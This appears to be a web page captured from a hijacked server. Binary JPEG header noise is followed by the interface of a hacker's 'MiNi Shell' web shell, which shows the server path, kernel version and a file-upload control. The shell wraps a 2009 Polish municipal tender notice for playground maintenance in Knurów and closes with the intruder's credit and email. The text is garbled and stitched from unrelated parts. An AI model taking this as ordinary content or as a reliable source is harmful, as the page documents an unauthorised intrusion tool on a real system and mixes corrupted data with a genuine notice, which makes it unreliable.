JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/127324-N-2009.html

<p class="kh_header"><b>Knurów: Bieżące utrzymanie, naprawa, montaż i konserwacja urządzeń zabawowych na gminnych placach zabaw.</b><br>
<b>Numer ogłoszenia: 127324 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 032 3392308, faks 032 2351521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie, naprawa, montaż i konserwacja urządzeń zabawowych na gminnych placach zabaw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje bieżące utrzymanie, naprawy i konserwacje urządzeń zabawowych na gminnych placach zabaw.
2.Urządzenia zabawowe, w  łącznej ilości 71 szt znajdują się na ogólnodostępnych placach zabaw zlokalizowanych na terenach zieleni miejskiej i obejmują następujące obiekty:
2.1. Plac zabaw przy ul. Dworcowej,
2.2. Plac zabaw przy ul. Ogana,
2.3. Plac zabaw przy ul. Krasickiego/Szpitalna,
2.4. Plac zabaw przy ul. K. Wielkiego 2,
2.5. Plac zabaw Chrobrego,
2.6. Plac zabaw Mieszka I,
2.7. Plac zabaw Ułanów,
2.8. Plac zabaw Armii Krajowej,
2.9. Plac zabaw przy ul. Kosmonautów 1-11,
2.10. Plac zabaw przy ul. Kopalnianej,
2.11. Plac zabaw przy ul. Staszica,
2.12. Plac zabaw przy ul. Parkowej NOT.
3.Wykaz urządzeń zabawowych na poszczególnych placach zabaw stanowi załącznik nr 1 do projektu umowy.
4.Zakres przedmiotu zamówienia obejmuje:
4.1. Naprawę urządzeń zabawowych w tym:
a)Plac zabaw ul. Ułanów - oczko:
uzupełnienie drewnianych elementów dachu w lokomotywie
b)Plac zabaw ul. Armii Krajowej:
uzupełnienie barierek dookoła zjeżdżalni;
demontaż zniszczonej zjeżdżalni,
uzupełnienie nawierzchni bezpiecznej pod kiwaczkami - 1 m2,
c)Plac zabaw przy ul. Ogana:
demontaż zniszczonej piaskownicy - rozebranie fundamentów betonowych i 5 murków  z cegły o wymiarach (szer x dł) 0,25m x 4,50m; 0,25mx4,80m 0,25mx5,00m; 0,25mx4,70m; 0,25mx4,80m
d)Plac zabaw ul. Parkowa NOT:
demontaż kołobiegu
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 3 do projektu umowy.
4.2.Montaż nowych certyfikowanych urządzeń zabawowych i regulaminów
Uwaga! 
Przedmiot zamówienia obejmuje montaż urządzeń zabawowych i regulaminów wraz z ich zakupem.
a)Plac zabaw ul. Ułanów:
montaż  huśtawki sprężynowej (kiwaczka)
b)Plac zabaw ul. Armii Krajowej
zabudowa nowej zjeżdżalni metalowej o długości 3,5m,
wykonanie 2 szt nowych piaskownic drewnianych o wymiarach 3,30mx3,30m dostosowanych do wymiarów istniejącej nawierzchni bezpiecznej conipur.
c)Plac zabaw ul. Kosmonautów 1-11:
zabudowa regulaminu korzystania z placu zabaw,
zabudowa huśtawki wahadłowej podwójnej,
zabudowa huśtawki wagowej.
d)Plac zabaw ul. Parkowa NOT
zabudowa huśtawki wagowej.
e)Plac zabaw ul. Dworcowa
zabudowa regulaminu korzystania z placu zabaw.
f)Plac zabaw ul. Ogana
zabudowa nowej piaskownicy drewnianej  sześciokątnej o dł. boku 3,0m,
zabudowa regulaminu korzystania z placu zabaw.
g)Plac zabaw ul. Staszica
zabudowa regulaminu korzystania z placu zabaw.
Charakterystykę i dane techniczne urządzeń zabawowych i regulaminów zawiera szczegółowy opis przedmiotu zamówienia stanowiący załącznik nr 3 do projektu umowy.
4.3. Bieżące utrzymanie, naprawa i konserwacja urządzeń zabawowych:
a)Przegląd urządzeń zlokalizowanych na poszczególnych placach zabaw mających na celu  ocenę poziomu bezpieczeństwa, stabilności, wytrzymałości, zmian struktury materiału, trwałości, stanu elementów fabrycznie zamkniętych, stanu fundamentów w tym:
codzienne kontrole przez oględziny dla ujawnienia zniszczeń i zagrożeń będących wynikiem wandalizmu, zużycia lub warunków pogodowych,
raz w tygodniu szczegółowe sprawdzenie funkcjonalności, stabilności i poziomu bezpieczeństwa urządzeń zabawowych.
b)Prowadzenie Dziennika Obsługi dla każdego placu zabaw oddzielnie i zapisywanie w nim wykonanych przeglądów i kontroli oraz wszelkich prac.
c)Wskazanie oraz skuteczne zabezpieczenie przed dalszym użytkowaniem urządzeń uszkodzonych, stwarzających zagrożenie dla bezpieczeństwa życia i zdrowia użytkowników (łącznie z ich ewentualnym rozebraniem).
d)Bieżące naprawy urządzeń zabawowych (przykręcanie desek,łańcuchów, smarowanie, usuwanie drzazg i zadziorów elementów drewnianych, uzupełnianie śrub, nakrętek, zaślepek, usuwanie luzów w połączeniach śrubowych) a także inne, nie wymagające zakupu części zamiennych.
e)1 raz w okresie trwania umowy przemalowanie elementów drewnianych urządzeń impregnatem i pomalowanie elementów metalowych z zachowaniem istniejącej kolorystyki, przy użyciu podkładów i farb dopuszczonych do stosowania w urządzeniach zabawowych (nie dotyczy zamontowanych na placu zabaw w parku NOT urządzeń stalowych).
f)Naprawę tablic informacyjnych  i  ostrzegawczych (na bieżąco).
g)Zapewnienie łączności telefonicznej do przyjmowania zgłoszeń Zamawiającego lub innych służb (Straż Miejska) dotyczących placów zabaw i podejmowanie odpowiedniej interwencji (w szczególności usunięcie lub zabezpieczenie elementu stwarzającego zagrożenie bezpieczeństwa użytkowników placu zabaw ) w ciągu najpóźniej 60 minut od przyjęcia zgłoszenia.
h)Wymianę (demontaż i montaż) zużytych lub zniszczonych elementów urządzeń zabawowych na nowe oryginalne pochodzące od producenta urządzeń, po uzgodnieniu z Zamawiającym na podstawie zleceń wg załącznika nr 2.
i)Zakup nowych elementów urządzeń zabawowych, o których mowa w punkcie h, u producenta urządzeń, na podstawie zleceń wg załącznika nr 2.
Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 3 do projektu umowy.
5.Wykonawca będzie prowadził Dzienniki obsługi, dla każdego placu zabaw oddzielnie, w których będzie rejestrował przeglądy oraz codzienne kontrole i  wykonane prace. Będą one przechowywane u Wykonawcy i okazywane do kontroli przedstawicielowi Zamawiającego i innym osobom upoważnionym przez Zamawiającego, a po zakończeniu realizacji przedmiotu zamówienia przekazane zostaną Zamawiającemu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.87.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Warunki, które powinni spełniać wykonawcy:
1.1.wykonawca winien spełniać warunki zawarte w art. 22 ust. 1 pkt 1-3 pzp 
1.2.wykonawca nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 pzp.
1.3.wykonawca winien być uprawniony do występowania w obrocie prawnym,
1.4.wykonawca winien wykazać się wykonaniem w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zadań o wartości łącznej minimum 40.000,00 zł odpowiadających swoim rodzajem pracom stanowiącym przedmiot zamówienia. Za usługi porównywalne rodzajem uznaje się usługi związane z utrzymaniem, naprawą i konserwacją placów zabaw.
1.5.wykonawca winien posiadać, przed podpisaniem umowy, ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, obejmujące szkody wyrządzone w związku z realizacją przedmiotu zamówienia na minimalną sumę ubezpieczenia 100.000,00 zł.
2.Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych poniżej. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wy­konawca spełnił.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu określonych w opisie warunków udziału w postępowaniu wykonawca winien załączyć do oferty:
1.oświadczenie, że spełnia warunki określone w art. 22 ust. 1 pkt 1-3 pzp,
2.oświadczenie, że nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 pzp,
3.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia. Wykaz winien zawierać nazwę zamawiającego, przedmiot zamówienia, datę wykonania oraz wartość. Do wykazu należy załączyć dokumenty potwierdzające, że te usługi zostały wykonane należycie (np. referencje),
5.oświadczenie, że przed podpisaniem umowy posiadać będzie polisę ubezpieczeniową od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, obejmującą szkody wyrządzone w związku z realizacją przedmiotu zamówienia na minimalną sumę ubezpieczenia 100.000,00 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy, w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 54, w godz. 8:00-13:30 lub za zaliczeniem pocztowym po uiszczeniu opłaty na konto zamawiającego. Opłata 7,25 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 10:30, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 54.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do kontaktu z wykonawcami są:
1) Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda tel. 032-339-23-08;
2) Podinspektor Wydziału Zamówień Publicznych - Agnieszka Szulc tel./fax 032-339-22-92,

Creat By MiNi SheLL
Email: jattceo@gmail.com